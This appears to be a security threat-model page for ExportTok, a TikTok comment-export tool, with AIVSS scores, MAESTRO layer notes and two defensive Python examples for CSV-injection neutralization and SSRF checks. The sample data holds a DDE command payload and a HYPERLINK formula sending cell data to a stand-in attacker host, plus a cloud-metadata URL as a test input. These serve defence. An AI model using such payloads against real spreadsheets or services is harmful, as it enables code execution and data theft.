ExportTok — agentic threat model
ExportTok is a single-purpose utility for scraping TikTok comments and exporting them. Its agentic risk is low: it behaves deterministically, does no autonomous planning, and integrates few tools. That score says nothing about the conventional web-application and data-handling risks covered in the MAESTRO section, which stand on their own.
OWASP AIVSS score rationale
| Agentic factor | Score |
| --- | --- |
| Autonomy of Action | 0.10 |
| Goal-Driven Planning | 0.10 |
| Self-Modification | 0.00 |
| Dynamic Tool Use | 0.20 |
| Persistent Memory | 0.10 |
| Contextual Awareness | 0.10 |
| Dynamic Identity | 0.00 |
| Multi-Agent Interactions | 0.00 |
| Non-Determinism | 0.20 |
| Opacity & Reflexivity | 0.10 |
Scored with the canonical OWASP AIVSS formula (AIVSS calculator reference); agentic risk factors estimated from the agent’s described capabilities.
MAESTRO 7-layer threat model
Per-layer threats for this agent. Layers tagged "Not certain from the listing" carry general, caveated commentary because the public description did not pin down that layer; for ExportTok that applies to all seven.
Layer 1, Foundation Models. Not certain from the listing — the tool mentions 'analyzing audience feedback' but does not say whether an LLM is involved or which one. If an LLM performs that analysis, every scraped comment is untrusted text reaching the model, so indirect prompt injection through crafted TikTok comments is the threat to plan for.
Layer 2, Data Operations. Not certain from the listing — the tool processes comment text, timestamps, and user info. Primary risks are leakage of cached or stored exports and CSV (formula) injection: a comment whose first non-whitespace character is =, +, -, or @ is evaluated as a formula when the export is opened in Excel unless cells are neutralized before they are written.
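The neutralization step for the Data Operations risk above, as an added example. This is not ExportTok's code (the product is closed-source and its export path is undocumented); the field names, the sample comments and the DDE-style payload in them are constructed for illustration, and the apostrophe prefix is the OWASP-recommended mitigation for CSV injection.

```python
import csv
import io

# Leading characters that make Excel (and LibreOffice) evaluate a cell as a
# formula. Leading whitespace, including tab and carriage return, is stripped
# before the check so a formula hidden behind it is still caught.
FORMULA_TRIGGERS = "=+-@"


def neutralize_cell(value):
    """Return a cell value a spreadsheet will display as text, never evaluate.

    Conservative: if the first non-whitespace character is a formula trigger,
    prefix the whole value with an apostrophe, which Excel reads as a text
    marker. Legitimate values such as "-5" or "+1 555 ..." are altered too;
    that loss of fidelity is the accepted cost of not executing attacker input.
    """
    if value is None:
        return ""
    text = str(value)
    stripped = text.lstrip()
    if stripped and stripped[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_comments(rows, fieldnames):
    """Write comment rows to CSV text with every cell neutralized.

    QUOTE_ALL wraps every field in double quotes (and doubles embedded quotes),
    so commas, quotes and newlines inside a comment cannot break out of their
    cell either.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fieldnames)
    for row in rows:
        writer.writerow([neutralize_cell(row.get(name)) for name in fieldnames])
    return buf.getvalue()


# Constructed sample comments (not real TikTok data). The second one is a
# classic DDE-style payload that would spawn a process if Excel evaluated it;
# the third hides a HYPERLINK formula behind leading spaces; the fourth is a
# benign comment that the conservative rule alters anyway.
SAMPLE_COMMENTS = [
    {"user": "alice", "timestamp": "2024-01-01T10:00:00Z", "text": "love this!"},
    {"user": "mallory", "timestamp": "2024-01-01T10:05:00Z",
     "text": "=cmd|'/C calc'!A0"},
    {"user": "trent", "timestamp": "2024-01-01T10:07:00Z",
     "text": '  +HYPERLINK("http://evil.example/?"&A1,"click")'},
    {"user": "carol", "timestamp": "2024-01-01T10:09:00Z", "text": "-1 rating, sorry"},
]

FIELDS = ["user", "timestamp", "text"]  # assumed export columns

if __name__ == "__main__":
    print(export_comments(SAMPLE_COMMENTS, FIELDS))
```

Run as a script it prints the sanitized CSV; the `mallory` and `trent` rows come out with a leading apostrophe in the text cell, and so does `carol`'s "-1 rating", which is the trade-off to be aware of. Some spreadsheet viewers show the apostrophe literally when importing CSV; if that is unacceptable, the alternative is to reject or strip the triggering prefix rather than escape it.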
Layer 3, Agent Frameworks. Not certain from the listing — likely a basic scraping script rather than an agentic framework. The main threat is insecure tool integration, specifically in how raw external web content is parsed and formatted.
Layer 4, Deployment and Infrastructure. Not certain from the listing — hosted as a closed-source web service, so standard web-application threats apply. In particular, if the URL the scraper fetches server-side can be influenced by user input, server-side request forgery (SSRF) against internal or cloud-metadata endpoints becomes possible.
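A fetch-target check of the kind that closes the SSRF path above, as an added example; it is not ExportTok's code. The allow-list of hosts, the requirement for https on port 443, and the resolver table used in the offline demo are assumptions for illustration. The check pins the resolved addresses so the caller can connect to them directly, which removes the DNS-rebinding gap between check and use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hosts the scraper is permitted to fetch from. Assumed for this example; the
# real product's fetch targets are not documented in the listing.
ALLOWED_HOSTS = {"www.tiktok.com", "tiktok.com"}

CGNAT = ipaddress.ip_network("100.64.0.0/10")


def is_public_address(addr):
    """True only for addresses that are not loopback, private, link-local
    (which covers the 169.254.169.254 metadata endpoint), multicast, reserved,
    unspecified or carrier-grade NAT. A zone suffix such as %eth0 is dropped."""
    ip = ipaddress.ip_address(addr.split("%", 1)[0])
    if ip.version == 4 and ip in CGNAT:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host):
    """Default resolver: every A/AAAA answer for host, deduplicated."""
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def make_resolver(table):
    """Offline stand-in for resolve_all (for tests and the demo below)."""
    return lambda host: list(table.get(host, []))


def validate_fetch_target(url, resolver=resolve_all):
    """Return (host, [addresses]) for a URL the scraper may fetch, else raise.

    Order of checks: https only, no embedded credentials, host on the
    allow-list, default port only, and every address the host resolves to is
    public. Rejecting when any answer is non-public defends against
    split-horizon DNS and rebinding tricks that mix a public and an internal
    address.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials embedded in URL")
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not on allow-list: {host!r}")
    if parts.port is not None and parts.port != 443:
        raise ValueError(f"port not allowed: {parts.port}")
    addrs = resolver(host)
    if not addrs:
        raise ValueError("host did not resolve")
    bad = [a for a in addrs if not is_public_address(a)]
    if bad:
        raise ValueError(f"host resolves to non-public address(es): {bad}")
    return host, addrs


def fetch_decision(url, resolver=resolve_all):
    """('allow', host, addrs) or ('deny', reason); never raises."""
    try:
        host, addrs = validate_fetch_target(url, resolver)
        return ("allow", host, addrs)
    except ValueError as exc:
        return ("deny", str(exc))


if __name__ == "__main__":
    # Constructed resolver answers; 52.1.2.3 stands in for a public address.
    demo = make_resolver({"www.tiktok.com": ["52.1.2.3"]})
    for candidate in [
        "https://www.tiktok.com/@someone/video/123",
        "http://www.tiktok.com/",
        "https://169.254.169.254/latest/meta-data/",
        "https://www.tiktok.com@10.0.0.5/",
        "https://www.tiktok.com:8443/",
    ]:
        print(candidate, "->", fetch_decision(candidate, demo))
```

The caller should open the connection to one of the returned addresses and send the original host name in SNI and the Host header, rather than letting the HTTP client resolve the name a second time; that second resolution is where rebinding attacks land.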
Layer 5, Evaluation and Observability. Not certain from the listing — no observability or guardrails are mentioned, so scraping abuse and attempts to bypass rate limiting could go unmonitored.
Layer 6, Security and Compliance. Not certain from the listing — closed-source and freemium. Compliance risk is high under GDPR/CCPA because public user profiles and comments are harvested, and automated scraping may also violate TikTok's Terms of Service.
Layer 7, Agent Ecosystem. Not certain from the listing — operates as a standalone horizontal tool with no apparent multi-agent orchestration or ecosystem integrations.
MAESTRO — the 7-layer agentic threat-modeling framework (Cloud Security Alliance / Ken Huang).